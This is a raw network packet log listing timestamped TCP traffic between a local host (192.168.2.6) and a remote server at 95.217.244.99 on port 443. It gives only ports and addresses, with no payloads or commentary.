Apr 23, 2024 21:44:11.321928978 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.321976900 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.321989059 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.322017908 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.322037935 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.331172943 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.331214905 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.331317902 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.331329107 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.331367970 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.331383944 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.340325117 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.340384960 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.340419054 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.340431929 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.340444088 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.340473890 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.348522902 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.348583937 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.348639965 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.348653078 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.348684072 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.348691940 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.357032061 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.357076883 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.357112885 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.357124090 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.357151031 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.357168913 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.366157055 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.366203070 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.366240025 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.366251945 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.366280079 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.366297960 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.373333931 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.373375893 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.373413086 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.373433113 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.373450994 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.373473883 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.381679058 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.381741047 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.381753922 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.381763935 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.381783009 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.381803036 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.388077974 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.388139009 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.388153076 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.388163090 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.388183117 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.388202906 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.394900084 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.394943953 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.394977093 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.394985914 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.395014048 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.395034075 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.395107985 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.395159006 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.395412922 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.395427942 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.434289932 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.434376001 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.434490919 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.434740067 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.434775114 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.867398977 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.867469072 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.867990971 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.868002892 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.868196964 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.868201971 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.556734085 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.556765079 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.556781054 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.556905985 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.556936979 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.557015896 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.654375076 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.654469967 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.654540062 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.654601097 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.794828892 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.794862032 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.794971943 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.794998884 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.795047045 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.894793987 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.894820929 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.894961119 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.894984961 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.895031929 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.967700005 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.967724085 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.967803001 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.967803955 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:12.967869043 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:12.967922926 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.015466928 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.015491009 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.015611887 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.015655041 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.015703917 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.058089972 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.058116913 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.058252096 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.058315039 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.058381081 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.097445011 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.097462893 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.097618103 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.097681046 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.097801924 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.139887094 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.139919996 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.139978886 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.139991999 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.140047073 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.182621956 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.182688951 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.182729959 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.182760000 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.182791948 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.182812929 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.216597080 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.216640949 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.216689110 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.216703892 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.216734886 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.216756105 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.241463900 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.241507053 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.241556883 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.241573095 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.241599083 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.241617918 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.265208960 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.265259027 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.265312910 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.265335083 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.265356064 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.265383959 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.285521984 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.285561085 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.285629034 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.285644054 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.285674095 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.285692930 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.305973053 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.306008101 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.306091070 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.306103945 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.306150913 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.306162119 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.326481104 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.326514959 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.326610088 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.326620102 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.326683998 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.344588041 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.344621897 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.344664097 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.344672918 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.344719887 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.344728947 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.360649109 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.360687017 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.360728025 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.360737085 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.360795975 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.377300978 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.377334118 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.377377987 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.377423048 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.377428055 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.377463102 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.394759893 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.394790888 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.394851923 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.394865036 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.394903898 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.394922972 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.407804966 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.407866001 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.407908916 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.407947063 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.407967091 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.408154011 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.423747063 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.423783064 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.423842907 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.423856974 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.423883915 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.423899889 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.436923981 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.436969995 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.437056065 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.437072992 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.437098026 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.437129974 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.451714993 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.451756954 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.451805115 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.451819897 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.451852083 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.451869011 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.465166092 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.465205908 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.465265036 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.465287924 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.465315104 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.465332031 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.476939917 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.476974964 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.477037907 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.477056026 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.477080107 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.477102041 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.490204096 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.490245104 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.490313053 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.490330935 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.490348101 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.490367889 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.501168966 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.501202106 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.501257896 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.501275063 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.501302958 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.501318932 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.512563944 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.512599945 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.512640953 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.512658119 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.512686014 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.512700081 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.522619009 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.522650003 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.522694111 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.522706985 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.522735119 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.522747993 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.533845901 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.533879995 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.533925056 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.533938885 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.533970118 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.533987045 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.543071985 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.543100119 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.543143988 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.543150902 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.543194056 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.543210030 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.552923918 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.552973986 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.553002119 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.553025961 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.553045988 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.553081036 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.562094927 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.562163115 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.562207937 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.562244892 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.562272072 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.562290907 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.571527958 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.571614027 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.571706057 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.571804047 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.579157114 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.579204082 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.579241991 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.579257011 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.579284906 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.579305887 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.587563992 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.587621927 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.587681055 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.587706089 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.587728024 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.587773085 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.588809013 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.588866949 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.588887930 CEST	443	49718	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.588936090 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.588999987 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.589021921 CEST	49718	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.634778976 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.634816885 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:13.634926081 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.635176897 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:13.635190964 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.100852013 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.102754116 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:14.107139111 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:14.107152939 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.107466936 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:14.107471943 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.834279060 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.834312916 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.834336042 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.834347010 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:14.834364891 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.834381104 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:14.834384918 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.834448099 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:14.939142942 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.939169884 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.939233065 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:14.939254045 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:14.939294100 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:14.939321041 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.089185953 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.089222908 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.089267969 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.089288950 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.089332104 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.089354992 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.198052883 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.198123932 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.198151112 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.198173046 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.198235035 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.276586056 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.276638985 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.276674986 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.276690960 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.276716948 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.276736975 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.328011990 CEST	443	49721	95.217.244.99	192.168.2.6
